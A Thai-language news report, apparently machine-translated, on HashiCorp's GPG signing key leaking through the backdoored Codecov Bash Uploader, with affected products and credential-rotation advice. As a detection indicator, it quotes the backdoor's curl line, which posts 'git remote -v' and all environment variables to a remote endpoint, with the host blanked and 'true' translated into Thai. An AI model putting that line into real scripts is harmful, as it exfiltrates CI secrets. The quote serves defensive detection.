HashiCorp ซึ่งเป็นที่รู้จักในการพัฒนาเครื่องมือโอเพ่นซอร์ส Vagrant, Packer, Nomad และ Terraform ได้ประกาศการรั่วไหลของคีย์ GPG ส่วนตัวที่ใช้ในการสร้างลายเซ็นดิจิทัลที่ตรวจสอบการเผยแพร่ ผู้โจมตีที่สามารถเข้าถึงคีย์ GPG อาจทำการเปลี่ยนแปลงที่ซ่อนอยู่กับผลิตภัณฑ์ HashiCorp โดยการตรวจสอบด้วยลายเซ็นดิจิทัลที่ถูกต้อง ในเวลาเดียวกัน บริษัทระบุว่าในระหว่างการตรวจสอบ ไม่พบร่องรอยของความพยายามในการแก้ไขดังกล่าว
ขณะนี้คีย์ GPG ที่ถูกบุกรุกได้ถูกเพิกถอนแล้วและมีการแนะนำคีย์ใหม่แทน ปัญหาส่งผลกระทบต่อการตรวจสอบโดยใช้ไฟล์ SHA256SUM และ SHA256SUM.sig เท่านั้น และไม่ส่งผลกระทบต่อการสร้างลายเซ็นดิจิทัลสำหรับแพ็คเกจ Linux DEB และ RPM ที่จัดหาผ่าน releases.hashicorp.com รวมถึงกลไกการตรวจสอบการเผยแพร่สำหรับ macOS และ Windows (AuthentiCode) .
การรั่วไหลเกิดขึ้นเนื่องจากการใช้สคริปต์ Codecov Bash Uploader (codecov-bash) ในโครงสร้างพื้นฐาน ซึ่งออกแบบมาเพื่อดาวน์โหลดรายงานความครอบคลุมจากระบบบูรณาการอย่างต่อเนื่อง ในระหว่างการโจมตีบริษัท Codecov ประตูหลังถูกซ่อนไว้ในสคริปต์ที่ระบุ ซึ่งรหัสผ่านและคีย์การเข้ารหัสจะถูกส่งไปยังเซิร์ฟเวอร์ของผู้โจมตี
ในการแฮ็ก ผู้โจมตีใช้ประโยชน์จากข้อผิดพลาดในกระบวนการสร้างอิมเมจ Codecov Docker ซึ่งอนุญาตให้พวกเขาดึงข้อมูลการเข้าถึงไปยัง GCS (Google Cloud Storage) ซึ่งจำเป็นต่อการเปลี่ยนแปลงสคริปต์ Bash Uploader ที่เผยแพร่จาก codecov.io เว็บไซต์. การเปลี่ยนแปลงดังกล่าวเกิดขึ้นในวันที่ 31 มกราคม โดยยังคงตรวจไม่พบเป็นเวลาสองเดือน และอนุญาตให้ผู้โจมตีดึงข้อมูลที่จัดเก็บไว้ในสภาพแวดล้อมระบบบูรณาการอย่างต่อเนื่องของลูกค้า การใช้โค้ดที่เป็นอันตรายที่เพิ่มเข้ามา ผู้โจมตีสามารถรับข้อมูลเกี่ยวกับพื้นที่เก็บข้อมูล Git ที่ทดสอบแล้วและตัวแปรสภาพแวดล้อมทั้งหมด รวมถึงโทเค็น คีย์การเข้ารหัส และรหัสผ่านที่ส่งไปยังระบบบูรณาการอย่างต่อเนื่อง เพื่อจัดระเบียบการเข้าถึงโค้ดแอปพลิเคชัน พื้นที่เก็บข้อมูล และบริการ เช่น Amazon Web Services และ GitHub
นอกเหนือจากการโทรโดยตรงแล้ว สคริปต์ Codecov Bash Uploader ยังถูกใช้เป็นส่วนหนึ่งของผู้อัปโหลดอื่นๆ เช่น Codecov-action (Github), Codecov-circleci-orb และ Codecov-bitrise-step ซึ่งผู้ใช้ก็ได้รับผลกระทบจากปัญหาเช่นกัน ขอแนะนำให้ผู้ใช้ codecov-bash และผลิตภัณฑ์ที่เกี่ยวข้องทุกคนตรวจสอบโครงสร้างพื้นฐานของตน รวมถึงเปลี่ยนรหัสผ่านและคีย์การเข้ารหัส คุณสามารถตรวจสอบการมีอยู่ของแบ็คดอร์ในสคริปต์ได้โดยการมีอยู่ของบรรทัด curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /อัพโหลด/v2 || จริง
ที่มา: opennet.ru